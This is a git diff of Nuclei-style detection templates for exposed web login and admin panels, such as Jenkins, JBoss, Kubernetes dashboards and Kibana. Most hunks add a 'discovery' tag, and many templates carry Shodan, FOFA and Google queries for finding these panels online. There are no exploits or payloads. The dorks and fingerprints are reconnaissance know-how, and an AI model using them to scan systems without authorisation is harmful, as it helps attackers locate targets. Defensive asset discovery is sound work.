shodan-query: http.html:"Login (Virtual Traffic Manager" + tags: detect,traffic-manager,panel,login,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/apps/zxtm/login.cgi" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Login (Virtual Traffic Manager" + + - type: status + status: - 200 # digest: 4a0a00473045022100e4c64bfd02299cfa7d678a97cdf0523f365b1a70830ea63fd51d9a06132048e902207c3abe8ccc628551578e29a0112ccf70737e4f4365479c7cecd062510433159b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/ixbus/ixbusweb-version.yaml b/http/exposed-panels/ixbus/ixbusweb-version.yaml index 9b768978f24..56a1f160998 100644 --- a/http/exposed-panels/ixbus/ixbusweb-version.yaml +++ b/http/exposed-panels/ixbus/ixbusweb-version.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"iXBus" - tags: panel,ixbusweb,cms + tags: panel,ixbusweb,cms,discovery http: - method: GET diff --git a/http/exposed-panels/ixcache-panel.yaml b/http/exposed-panels/ixcache-panel.yaml index 02b7a09b8be..626e4b78861 100644 --- a/http/exposed-panels/ixcache-panel.yaml +++ b/http/exposed-panels/ixcache-panel.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 fofa-query: app="iXCache" - tags: ixcache,panel + tags: ixcache,panel,discovery http: - method: GET diff --git a/http/exposed-panels/jamf-login.yaml b/http/exposed-panels/jamf-login.yaml index 6e1742db1c5..084fd8651b1 100644 --- a/http/exposed-panels/jamf-login.yaml +++ b/http/exposed-panels/jamf-login.yaml @@ -15,7 +15,7 @@ info: shodan-query: title:"Jamf Pro" product: jamf vendor: jamf - tags: panel,jamf + tags: panel,jamf,discovery http: - method: GET diff --git a/http/exposed-panels/jamf-panel.yaml b/http/exposed-panels/jamf-panel.yaml index f413ddd4c63..772e1a68957 100644 --- a/http/exposed-panels/jamf-panel.yaml +++ b/http/exposed-panels/jamf-panel.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.favicon.hash:1262005940 product: jamf vendor: jamf - tags: jamf,panel,mdm + tags: jamf,panel,mdm,discovery http: - method: GET diff --git a/http/exposed-panels/jamf-setup-assistant.yaml b/http/exposed-panels/jamf-setup-assistant.yaml index 9d8c1b062f8..b3e5c9432b1 100644 --- a/http/exposed-panels/jamf-setup-assistant.yaml +++ b/http/exposed-panels/jamf-setup-assistant.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.html:"Jamf Pro Setup" product: jamf vendor: jamf - tags: jamf,setup,panel + tags: jamf,setup,panel,discovery http: - method: GET diff --git a/http/exposed-panels/jaspersoft-panel.yaml b/http/exposed-panels/jaspersoft-panel.yaml index bef9474c963..e32321975d4 100644 --- a/http/exposed-panels/jaspersoft-panel.yaml +++ b/http/exposed-panels/jaspersoft-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"jaspersoft" fofa-query: title="jaspersoft" google-query: intitle:"jaspersoft" - tags: panel,jaspersoft,tibco + tags: panel,jaspersoft,tibco,discovery http: - method: GET diff --git a/http/exposed-panels/jboss/jboss-jbpm-admin.yaml b/http/exposed-panels/jboss/jboss-jbpm-admin.yaml index c67daa266a0..90b299a4b13 100644 --- a/http/exposed-panels/jboss/jboss-jbpm-admin.yaml +++ b/http/exposed-panels/jboss/jboss-jbpm-admin.yaml @@ -20,7 +20,7 @@ info: - html:"JBossWS" - http.html:"jbossws" fofa-query: body="jbossws" - tags: jboss,panel,login,redhat + tags: jboss,panel,login,redhat,discovery http: - method: GET diff --git a/http/exposed-panels/jboss/jboss-juddi.yaml b/http/exposed-panels/jboss/jboss-juddi.yaml index 1e063eb61a5..7cdd2edc8b9 100644 --- a/http/exposed-panels/jboss/jboss-juddi.yaml +++ b/http/exposed-panels/jboss/jboss-juddi.yaml @@ -22,7 +22,7 @@ info: - html:"JBoss WS" - http.html:"jboss ws" fofa-query: body="jboss ws" - tags: panel,jboss,juddi,redhat + tags: panel,jboss,juddi,redhat,discovery http: - method: GET diff --git a/http/exposed-panels/jboss/jboss-soa-platform.yaml b/http/exposed-panels/jboss/jboss-soa-platform.yaml index b749cdaf88b..1fa4c7ac6d1 100644 --- a/http/exposed-panels/jboss/jboss-soa-platform.yaml +++ b/http/exposed-panels/jboss/jboss-soa-platform.yaml @@ -19,7 +19,7 @@ info: - http.title:"welcome to the jboss soa platform" fofa-query: title="welcome to the jboss soa platform" google-query: intitle:"welcome to the jboss soa platform" - tags: panel,jboss,soa,redhat,detect + tags: panel,jboss,soa,redhat,detect,discovery http: - method: GET diff --git a/http/exposed-panels/jboss/jmx-console.yaml b/http/exposed-panels/jboss/jmx-console.yaml index 45a72d7c61a..56c19edc29c 100644 --- a/http/exposed-panels/jboss/jmx-console.yaml +++ b/http/exposed-panels/jboss/jmx-console.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: redhat product: jboss_keycloak - tags: panel,jmx,jboss,redhat + tags: panel,jmx,jboss,redhat,discovery http: - method: GET diff --git a/http/exposed-panels/jboss/wildfly-panel.yaml b/http/exposed-panels/jboss/wildfly-panel.yaml index ddafeb462c0..da34690a760 100644 --- a/http/exposed-panels/jboss/wildfly-panel.yaml +++ b/http/exposed-panels/jboss/wildfly-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: redhat product: wildfly - tags: panel,jboss,wildfly,redhat + tags: panel,jboss,wildfly,redhat,discovery http: - method: GET diff --git a/http/exposed-panels/jcms-panel.yaml b/http/exposed-panels/jcms-panel.yaml index b970604ca0b..d47d39fa0b0 100644 --- a/http/exposed-panels/jcms-panel.yaml +++ b/http/exposed-panels/jcms-panel.yaml @@ -20,7 +20,7 @@ info: - html:"Jalios JCMS" - http.html:"jalios jcms" fofa-query: body="jalios jcms" - tags: panel,jalios,jcms + tags: panel,jalios,jcms,discovery http: - method: GET diff --git a/http/exposed-panels/jedox-web-panel.yaml b/http/exposed-panels/jedox-web-panel.yaml index eaa0d397777..15a9b2f7485 100644 --- a/http/exposed-panels/jedox-web-panel.yaml +++ b/http/exposed-panels/jedox-web-panel.yaml @@ -26,7 +26,7 @@ info: fofa-query: - title="jedox web login" - title="jedox web - login" - tags: panel,jedox,detect + tags: panel,jedox,detect,discovery http: - method: GET diff --git a/http/exposed-panels/jeedom-panel.yaml b/http/exposed-panels/jeedom-panel.yaml index 97013d12ee5..5aa244f8f4f 100644 --- a/http/exposed-panels/jeedom-panel.yaml +++ b/http/exposed-panels/jeedom-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"jeedom" fofa-query: title="jeedom" google-query: intitle:"jeedom" - tags: panel,jeedom,login + tags: panel,jeedom,login,discovery http: - method: GET diff --git a/http/exposed-panels/jellyseerr-login-panel.yaml b/http/exposed-panels/jellyseerr-login-panel.yaml index afcbd3eaac0..2276c6c8084 100644 --- a/http/exposed-panels/jellyseerr-login-panel.yaml +++ b/http/exposed-panels/jellyseerr-login-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:-2017604252 - tags: panel,jellyseerr,detect + tags: panel,jellyseerr,detect,discovery http: - method: GET diff --git a/http/exposed-panels/jenkins-api-panel.yaml b/http/exposed-panels/jenkins-api-panel.yaml index 63c164c3faa..1b68f36793d 100644 --- a/http/exposed-panels/jenkins-api-panel.yaml +++ b/http/exposed-panels/jenkins-api-panel.yaml @@ -18,7 +18,7 @@ info: - http.favicon.hash:81586312 - product:"jenkins" fofa-query: icon_hash=81586312 - tags: panel,api,jenkins + tags: panel,api,jenkins,discovery http: - method: GET diff --git a/http/exposed-panels/jenkins-login.yaml b/http/exposed-panels/jenkins-login.yaml index 1aa95f98e04..5862f443a47 100644 --- a/http/exposed-panels/jenkins-login.yaml +++ b/http/exposed-panels/jenkins-login.yaml @@ -20,7 +20,7 @@ info: - http.favicon.hash:81586312 - product:"jenkins" fofa-query: icon_hash=81586312 - tags: panel,jenkins + tags: panel,jenkins,discovery http: - method: GET diff --git a/http/exposed-panels/jfrog-login.yaml b/http/exposed-panels/jfrog-login.yaml index a527f3e0113..5becea2c0e4 100644 --- a/http/exposed-panels/jfrog-login.yaml +++ b/http/exposed-panels/jfrog-login.yaml @@ -18,7 +18,7 @@ info: shodan-query: "http.title:\"JFrog\"" product: artifactory vendor: jfrog - tags: panel,jfrog,edb,detect,login + tags: panel,jfrog,edb,detect,login,discovery http: - method: GET diff --git a/http/exposed-panels/joget/joget-panel.yaml b/http/exposed-panels/joget/joget-panel.yaml index 234a4d7afd5..5b512e9f00e 100644 --- a/http/exposed-panels/joget/joget-panel.yaml +++ b/http/exposed-panels/joget/joget-panel.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.favicon.hash:-1343712810 product: joget_dx vendor: joget - tags: panel,joget + tags: panel,joget,discovery http: - method: GET diff --git a/http/exposed-panels/joomla-panel.yaml b/http/exposed-panels/joomla-panel.yaml index 36f41ead3d6..5c056ae1b27 100644 --- a/http/exposed-panels/joomla-panel.yaml +++ b/http/exposed-panels/joomla-panel.yaml @@ -15,7 +15,7 @@ info: - http.component:"joomla" - cpe:"cpe:2.3:a:joomla:joomla\!" fofa-query: body="joomla! - open source content management" - tags: panel,joomla + tags: panel,joomla,discovery http: - method: GET diff --git a/http/exposed-panels/joplin-panel.yaml b/http/exposed-panels/joplin-panel.yaml index 93e262eef29..5c7745c7a7f 100644 --- a/http/exposed-panels/joplin-panel.yaml +++ b/http/exposed-panels/joplin-panel.yaml @@ -10,7 +10,7 @@ info: verified: true shodan-query: 'title:"Joplin Server"' max-request: 1 - tags: panel,joplin,login + tags: panel,joplin,login,discovery http: - method: GET diff --git a/http/exposed-panels/jorani-panel.yaml b/http/exposed-panels/jorani-panel.yaml index a16f00caae7..d72255680cc 100644 --- a/http/exposed-panels/jorani-panel.yaml +++ b/http/exposed-panels/jorani-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: html:"Login - Jorani" product: jorani vendor: jorani - tags: panel,jorani,login + tags: panel,jorani,login,discovery http: - method: GET diff --git a/http/exposed-panels/jsherp-boot-panel.yaml b/http/exposed-panels/jsherp-boot-panel.yaml index 46d0193013f..c7a5d144f4d 100644 --- a/http/exposed-panels/jsherp-boot-panel.yaml +++ b/http/exposed-panels/jsherp-boot-panel.yaml @@ -12,7 +12,7 @@ info: vendor: jishenghua product: jsherp shodan-query: http.favicon.hash:-1298131932 - tags: panel,jsherp,login,detect + tags: panel,jsherp,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/jumpserver-panel.yaml b/http/exposed-panels/jumpserver-panel.yaml index 23e47e2fc21..8ef69ab6f1a 100644 --- a/http/exposed-panels/jumpserver-panel.yaml +++ b/http/exposed-panels/jumpserver-panel.yaml @@ -20,7 +20,7 @@ info: zoomeye-query: app="JumpServer Bastion Host" product: jumpserver vendor: fit2cloud - tags: panel,jumpserver,login + tags: panel,jumpserver,login,discovery http: - method: GET diff --git a/http/exposed-panels/juniper-panel.yaml b/http/exposed-panels/juniper-panel.yaml index fb3657cdee0..5118a9450ec 100644 --- a/http/exposed-panels/juniper-panel.yaml +++ b/http/exposed-panels/juniper-panel.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Juniper Web Device Manager" - tags: panel,juniper,vpn,login + tags: panel,juniper,vpn,login,discovery http: - method: GET diff --git a/http/exposed-panels/jupyter-notebook.yaml b/http/exposed-panels/jupyter-notebook.yaml index 74f0485452a..511d629bfcc 100644 --- a/http/exposed-panels/jupyter-notebook.yaml +++ b/http/exposed-panels/jupyter-notebook.yaml @@ -17,7 +17,7 @@ info: shodan-query: http.html:"JupyterHub" product: notebook vendor: jupyter - tags: edb,panel,jupyter,notebook,exposure + tags: edb,panel,jupyter,notebook,exposure,discovery http: - method: GET diff --git a/http/exposed-panels/kafka-center-login.yaml b/http/exposed-panels/kafka-center-login.yaml index b15fc756f27..842423edd02 100644 --- a/http/exposed-panels/kafka-center-login.yaml +++ b/http/exposed-panels/kafka-center-login.yaml @@ -23,7 +23,7 @@ info: google-query: - intitle:"kafka center" - intitle:"kafka consumer offset monitor" - tags: panel,kafka,apache + tags: panel,kafka,apache,discovery http: - method: GET diff --git a/http/exposed-panels/kafka-connect-ui.yaml b/http/exposed-panels/kafka-connect-ui.yaml index 29108db03a8..26b0340542a 100644 --- a/http/exposed-panels/kafka-connect-ui.yaml +++ b/http/exposed-panels/kafka-connect-ui.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,kafka,apache + tags: panel,kafka,apache,discovery http: - method: GET diff --git a/http/exposed-panels/kafka-consumer-monitor.yaml b/http/exposed-panels/kafka-consumer-monitor.yaml index 85e83d35522..8cc74f869df 100644 --- a/http/exposed-panels/kafka-consumer-monitor.yaml +++ b/http/exposed-panels/kafka-consumer-monitor.yaml @@ -23,7 +23,7 @@ info: google-query: - intitle:"kafka center" - intitle:"kafka consumer offset monitor" - tags: panel,kafka,apache + tags: panel,kafka,apache,discovery http: - method: GET diff --git a/http/exposed-panels/kafka-monitoring.yaml b/http/exposed-panels/kafka-monitoring.yaml index 721e436daa6..9711afdb29e 100644 --- a/http/exposed-panels/kafka-monitoring.yaml +++ b/http/exposed-panels/kafka-monitoring.yaml @@ -22,7 +22,7 @@ info: google-query: - intitle:"kafka center" - intitle:"kafka consumer offset monitor" - tags: panel,kafka,apache + tags: panel,kafka,apache,discovery http: - method: GET diff --git a/http/exposed-panels/kafka-topics-ui.yaml b/http/exposed-panels/kafka-topics-ui.yaml index a8badb4cd26..21e84eb7fbf 100644 --- a/http/exposed-panels/kafka-topics-ui.yaml +++ b/http/exposed-panels/kafka-topics-ui.yaml @@ -17,7 +17,7 @@ info: vendor: provectus product: ui platform: kafka - tags: panel,kafka,apache,detect,provectus + tags: panel,kafka,apache,detect,provectus,discovery http: - method: GET diff --git a/http/exposed-panels/kanboard-login.yaml b/http/exposed-panels/kanboard-login.yaml index 6eeff54eb3b..826a92df7cd 100644 --- a/http/exposed-panels/kanboard-login.yaml +++ b/http/exposed-panels/kanboard-login.yaml @@ -16,7 +16,7 @@ info: product: kanboard shodan-query: http.favicon.hash:2056442365 fofa-query: icon_hash=2056442365 - tags: panel,kanboard + tags: panel,kanboard,discovery http: - method: GET diff --git a/http/exposed-panels/kasm-login-panel.yaml b/http/exposed-panels/kasm-login-panel.yaml index 53327d56831..90fd27d7922 100644 --- a/http/exposed-panels/kasm-login-panel.yaml +++ b/http/exposed-panels/kasm-login-panel.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:-2144699833 - tags: panel,kasm,login,detect + tags: panel,kasm,login,detect,discovery http: - raw: diff --git a/http/exposed-panels/kavita-panel-detect.yaml b/http/exposed-panels/kavita-panel-detect.yaml index bff9b691e25..91bedb699dd 100644 --- a/http/exposed-panels/kavita-panel-detect.yaml +++ b/http/exposed-panels/kavita-panel-detect.yaml @@ -19,7 +19,7 @@ info: vendor: kavitareader fofa-query: title="kavita" google-query: intitle:"kavita" - tags: panel,kavita + tags: panel,kavita,discovery http: - method: GET diff --git a/http/exposed-panels/keenetic-web-login.yaml b/http/exposed-panels/keenetic-web-login.yaml index 5b852f1331a..e8e40b15cb8 100644 --- a/http/exposed-panels/keenetic-web-login.yaml +++ b/http/exposed-panels/keenetic-web-login.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,keenetic,edb + tags: panel,keenetic,edb,discovery http: - method: GET diff --git a/http/exposed-panels/kemp-loadmaster-panel.yaml b/http/exposed-panels/kemp-loadmaster-panel.yaml index e0455ea94cc..a7480f1637d 100644 --- a/http/exposed-panels/kemp-loadmaster-panel.yaml +++ b/http/exposed-panels/kemp-loadmaster-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"Kemp Login Screen" - tags: login,progress,kemp,loadmaster,panel,detect + tags: login,progress,kemp,loadmaster,panel,detect,discovery http: - method: GET diff --git a/http/exposed-panels/kenesto-login.yaml b/http/exposed-panels/kenesto-login.yaml index 714d4856f8e..8445143c4b8 100644 --- a/http/exposed-panels/kenesto-login.yaml +++ b/http/exposed-panels/kenesto-login.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 fofa-query: app="kenesto" - tags: login,tech,kenesto,panel + tags: login,tech,kenesto,panel,discovery http: - method: GET diff --git a/http/exposed-panels/kentico-login.yaml b/http/exposed-panels/kentico-login.yaml index d8c0fc26dd4..9cf804e1147 100644 --- a/http/exposed-panels/kentico-login.yaml +++ b/http/exposed-panels/kentico-login.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,login,kentico + tags: panel,login,kentico,discovery http: - method: GET diff --git a/http/exposed-panels/kerio-connect-client.yaml b/http/exposed-panels/kerio-connect-client.yaml index 7d55d551c9e..367ed94f100 100644 --- a/http/exposed-panels/kerio-connect-client.yaml +++ b/http/exposed-panels/kerio-connect-client.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.title:"Kerio Connect Client" product: kerio_connect vendor: gfi - tags: panel,kerio + tags: panel,kerio,discovery http: - method: GET diff --git a/http/exposed-panels/kerion-control-panel.yaml b/http/exposed-panels/kerion-control-panel.yaml index 47eccb71ac1..abb40e4a1b6 100644 --- a/http/exposed-panels/kerion-control-panel.yaml +++ b/http/exposed-panels/kerion-control-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-631002664 - tags: panel,kerio,login + tags: panel,kerio,login,discovery http: - method: GET diff --git a/http/exposed-panels/kettle-panel.yaml b/http/exposed-panels/kettle-panel.yaml index 16e03910db1..a88b5bfcd63 100644 --- a/http/exposed-panels/kettle-panel.yaml +++ b/http/exposed-panels/kettle-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: basic realm="Kettle" - tags: panel,kettle + tags: panel,kettle,discovery http: - method: GET diff --git a/http/exposed-panels/keycloak-admin-panel.yaml b/http/exposed-panels/keycloak-admin-panel.yaml index c41f6a6cd22..8c4363db1aa 100644 --- a/http/exposed-panels/keycloak-admin-panel.yaml +++ b/http/exposed-panels/keycloak-admin-panel.yaml @@ -23,7 +23,7 @@ info: - body="keycloak" - title="keycloak" google-query: intitle:"keycloak" - tags: panel,keycloak,redhat + tags: panel,keycloak,redhat,discovery http: - method: GET diff --git a/http/exposed-panels/kfm/kaes-file-manager.yaml b/http/exposed-panels/kfm/kaes-file-manager.yaml index 77e63bbc787..302f6825a54 100644 --- a/http/exposed-panels/kfm/kaes-file-manager.yaml +++ b/http/exposed-panels/kfm/kaes-file-manager.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,kaes,filemanager,kfm + tags: panel,kaes,filemanager,kfm,discovery http: - method: GET diff --git a/http/exposed-panels/kfm/kfm-login-panel.yaml b/http/exposed-panels/kfm/kfm-login-panel.yaml index ad5e1f5b680..2ccafbcdf39 100644 --- a/http/exposed-panels/kfm/kfm-login-panel.yaml +++ b/http/exposed-panels/kfm/kfm-login-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,kfm + tags: panel,kfm,discovery http: - method: GET diff --git a/http/exposed-panels/kiali-panel.yaml b/http/exposed-panels/kiali-panel.yaml index 528363da384..4ef6b13904b 100644 --- a/http/exposed-panels/kiali-panel.yaml +++ b/http/exposed-panels/kiali-panel.yaml @@ -16,7 +16,7 @@ info: vendor: kiali product: kiali shodan-query: title:"Kiali" - tags: panel,kiali,detect,login + tags: panel,kiali,detect,login,discovery http: - method: GET diff --git a/http/exposed-panels/kibana-panel.yaml b/http/exposed-panels/kibana-panel.yaml index 9e48de92e1d..6c81497883e 100644 --- a/http/exposed-panels/kibana-panel.yaml +++ b/http/exposed-panels/kibana-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"kibana" fofa-query: title="kibana" google-query: intitle:"kibana" - tags: panel,kibana,elastic + tags: panel,kibana,elastic,discovery http: - method: GET diff --git a/http/exposed-panels/kiteworks-pcn-panel.yaml b/http/exposed-panels/kiteworks-pcn-panel.yaml index 5264ebec61e..975c986b5ff 100644 --- a/http/exposed-panels/kiteworks-pcn-panel.yaml +++ b/http/exposed-panels/kiteworks-pcn-panel.yaml @@ -17,7 +17,7 @@ info: product: kiteworks shodan-query: http.favicon.hash:-1215318992 fofa-query: icon_hash=-1215318992 - tags: panel,kiteworks,login,detect,accellion + tags: panel,kiteworks,login,detect,accellion,discovery http: - method: GET diff --git a/http/exposed-panels/kiwitcms-login.yaml b/http/exposed-panels/kiwitcms-login.yaml index 060aa85455a..f3b52872594 100644 --- a/http/exposed-panels/kiwitcms-login.yaml +++ b/http/exposed-panels/kiwitcms-login.yaml @@ -20,7 +20,7 @@ info: - http.title:"kiwi tcms - login" http.favicon.hash:-1909533337 fofa-query: title="kiwi tcms - login" http.favicon.hash:-1909533337 google-query: intitle:"kiwi tcms - login" http.favicon.hash:-1909533337 - tags: kiwitcms,panel + tags: kiwitcms,panel,discovery http: - method: GET diff --git a/http/exposed-panels/kkfileview-panel.yaml b/http/exposed-panels/kkfileview-panel.yaml index 7d2b8bbd211..42de1fabab3 100644 --- a/http/exposed-panels/kkfileview-panel.yaml +++ b/http/exposed-panels/kkfileview-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.title:"kkFileView" product: kkfileview vendor: keking - tags: panel,kkfileview + tags: panel,kkfileview,discovery http: - method: GET diff --git a/http/exposed-panels/klog-server-panel.yaml b/http/exposed-panels/klog-server-panel.yaml index 1f4a305368c..fa94ac6e0e2 100644 --- a/http/exposed-panels/klog-server-panel.yaml +++ b/http/exposed-panels/klog-server-panel.yaml @@ -12,7 +12,7 @@ info: max-request: 1 vendor: klogserver product: klog_server - tags: panel,login,klog-server,detect + tags: panel,login,klog-server,detect,discovery http: - method: GET diff --git a/http/exposed-panels/klr300n-panel.yaml b/http/exposed-panels/klr300n-panel.yaml index 2ceb0c0d6f5..add4d49725e 100644 --- a/http/exposed-panels/klr300n-panel.yaml +++ b/http/exposed-panels/klr300n-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: Roteador Wireless KLR 300N - tags: keo,klr300n,panel,login + tags: keo,klr300n,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/kodak-network-panel.yaml b/http/exposed-panels/kodak-network-panel.yaml index 2abb7cd92e8..238c1900a67 100644 --- a/http/exposed-panels/kodak-network-panel.yaml +++ b/http/exposed-panels/kodak-network-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 fofa-query: 网络键盘控制台 - tags: panel,login,kedacom,network + tags: panel,login,kedacom,network,discovery http: - method: GET diff --git a/http/exposed-panels/koel-panel.yaml b/http/exposed-panels/koel-panel.yaml index 93e70b420ee..4266f01adbf 100644 --- a/http/exposed-panels/koel-panel.yaml +++ b/http/exposed-panels/koel-panel.yaml @@ -17,7 +17,7 @@ info: vendor: koel product: koel shodan-query: title:"Koel" - tags: panel,koel,login + tags: panel,koel,login,discovery http: - method: GET diff --git a/http/exposed-panels/kong-manager-exposure.yaml b/http/exposed-panels/kong-manager-exposure.yaml index ede73df1591..2c64330e985 100644 --- a/http/exposed-panels/kong-manager-exposure.yaml +++ b/http/exposed-panels/kong-manager-exposure.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: title:"Kong Manager" - tags: kong,manager,misconfig,exposure + tags: kong,manager,misconfig,exposure,discovery http: - method: GET diff --git a/http/exposed-panels/konga-panel.yaml b/http/exposed-panels/konga-panel.yaml index 571136718ea..75e23cbb405 100644 --- a/http/exposed-panels/konga-panel.yaml +++ b/http/exposed-panels/konga-panel.yaml @@ -15,7 +15,7 @@ info: max-request: 1 vendor: pantsel product: konga - tags: tech,konga,oss,panel,pantsel + tags: tech,konga,oss,panel,pantsel,discovery http: - method: GET diff --git a/http/exposed-panels/kopano-webapp-panel.yaml b/http/exposed-panels/kopano-webapp-panel.yaml index a830e66c091..8b9cf51677e 100644 --- a/http/exposed-panels/kopano-webapp-panel.yaml +++ b/http/exposed-panels/kopano-webapp-panel.yaml @@ -15,7 +15,7 @@ info: vendor: kopano product: webapp shodan-query: http.title:"Kopano WebApp" - tags: panel,kopano,login,detect + tags: panel,kopano,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/kraken-cluster-monitoring.yaml b/http/exposed-panels/kraken-cluster-monitoring.yaml index 2f17cbd579d..a0744107e0c 100644 --- a/http/exposed-panels/kraken-cluster-monitoring.yaml +++ b/http/exposed-panels/kraken-cluster-monitoring.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Kraken dashboard" - tags: panel,kraken,cluster + tags: panel,kraken,cluster,discovery http: - method: GET diff --git a/http/exposed-panels/kronos-workforce-central.yaml b/http/exposed-panels/kronos-workforce-central.yaml index 74ba32e0763..6885dbba48c 100644 --- a/http/exposed-panels/kronos-workforce-central.yaml +++ b/http/exposed-panels/kronos-workforce-central.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: panel,kronos + tags: panel,kronos,discovery http: - method: GET diff --git a/http/exposed-panels/kubernetes-dashboard.yaml b/http/exposed-panels/kubernetes-dashboard.yaml index 053e6160a8b..28b200bb93d 100644 --- a/http/exposed-panels/kubernetes-dashboard.yaml +++ b/http/exposed-panels/kubernetes-dashboard.yaml @@ -13,7 +13,7 @@ info: vendor: kubernetes product: dashboard shodan-query: product:"kubernetes" - tags: panel,kubernetes,devops + tags: panel,kubernetes,devops,discovery http: - method: GET diff --git a/http/exposed-panels/kubernetes-enterprise-manager.yaml b/http/exposed-panels/kubernetes-enterprise-manager.yaml index 45fec8947b3..b9a082928ed 100644 --- a/http/exposed-panels/kubernetes-enterprise-manager.yaml +++ b/http/exposed-panels/kubernetes-enterprise-manager.yaml @@ -19,7 +19,7 @@ info: - app="kubernetes-enterprise-manager" shodan-query: http.title:"kubernetes web view" google-query: intitle:"kubernetes web view" - tags: tech,kubernetes,panel + tags: tech,kubernetes,panel,discovery http: - method: GET diff --git a/http/exposed-panels/kubernetes-mirantis.yaml b/http/exposed-panels/kubernetes-mirantis.yaml index 4d5c4c12f4c..317cfd36207 100644 --- a/http/exposed-panels/kubernetes-mirantis.yaml +++ b/http/exposed-panels/kubernetes-mirantis.yaml @@ -16,7 +16,7 @@ info: fofa-query: app="Mirantis-Kubernetes-Engine" product: kubernetes_engine vendor: mirantis - tags: tech,kubernetes,devops,kube,k8s,panel + tags: tech,kubernetes,devops,kube,k8s,panel,discovery http: - method: GET diff --git a/http/exposed-panels/kubernetes-web-view.yaml b/http/exposed-panels/kubernetes-web-view.yaml index 06065a0ea67..ffbd3787a2f 100644 --- a/http/exposed-panels/kubernetes-web-view.yaml +++ b/http/exposed-panels/kubernetes-web-view.yaml @@ -22,7 +22,7 @@ info: - title="kubernetes web view" - app="kubernetes-enterprise-manager" google-query: intitle:"kubernetes web view" - tags: panel,misconfig,kubernetes,k8s + tags: panel,misconfig,kubernetes,k8s,discovery http: - method: GET diff --git a/http/exposed-panels/kubeview-dashboard.yaml b/http/exposed-panels/kubeview-dashboard.yaml index cf8366c8663..e5934c465be 100644 --- a/http/exposed-panels/kubeview-dashboard.yaml +++ b/http/exposed-panels/kubeview-dashboard.yaml @@ -21,7 +21,7 @@ info: - icon_hash=-379154636 - title="kubeview" google-query: intitle:"kubeview" - tags: exposure,k8s,kubernetes,kubeview,dashboard,panel,kubeview_project + tags: exposure,k8s,kubernetes,kubeview,dashboard,panel,kubeview_project,discovery http: - method: GET diff --git a/http/exposed-panels/label-studio-panel.yaml b/http/exposed-panels/label-studio-panel.yaml index 9c87fb79da6..f3c585c7fd2 100644 --- a/http/exposed-panels/label-studio-panel.yaml +++ b/http/exposed-panels/label-studio-panel.yaml @@ -14,7 +14,7 @@ info: vendor: heartex product: label_studio shodan-query: http.favicon.hash:-1649949475 - tags: label-studio,login,panel + tags: label-studio,login,panel,discovery http: - raw: diff --git a/http/exposed-panels/labkey-server-login.yaml b/http/exposed-panels/labkey-server-login.yaml index f1bbed71270..dca9adf2ed3 100644 --- a/http/exposed-panels/labkey-server-login.yaml +++ b/http/exposed-panels/labkey-server-login.yaml @@ -20,7 +20,7 @@ info: - "server: labkey" fofa-query: 'title="sign in: /home"' google-query: 'intitle:"sign in: /home"' - tags: panel,labkey + tags: panel,labkey,discovery http: - method: GET diff --git a/http/exposed-panels/labtech-panel.yaml b/http/exposed-panels/labtech-panel.yaml index c58503b450e..93681dcee68 100644 --- a/http/exposed-panels/labtech-panel.yaml +++ b/http/exposed-panels/labtech-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: labtech_software product: labtech - tags: panel,labtech,labtech_software + tags: panel,labtech,labtech_software,discovery http: - method: GET diff --git a/http/exposed-panels/lacie-panel.yaml b/http/exposed-panels/lacie-panel.yaml index c2c0e6fda39..f924de69f96 100644 --- a/http/exposed-panels/lacie-panel.yaml +++ b/http/exposed-panels/lacie-panel.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: panel,lacie,login,edb + tags: panel,lacie,login,edb,discovery http: - method: GET diff --git a/http/exposed-panels/lancom-router-panel.yaml b/http/exposed-panels/lancom-router-panel.yaml index d23fce237b9..f3e5d17014c 100644 --- a/http/exposed-panels/lancom-router-panel.yaml +++ b/http/exposed-panels/lancom-router-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: html:"LANCOM Systems GmbH" product: wlc-4006 vendor: lancom-systems - tags: panel,lancom,router + tags: panel,lancom,router,discovery http: - method: GET diff --git a/http/exposed-panels/landrayoa-panel.yaml 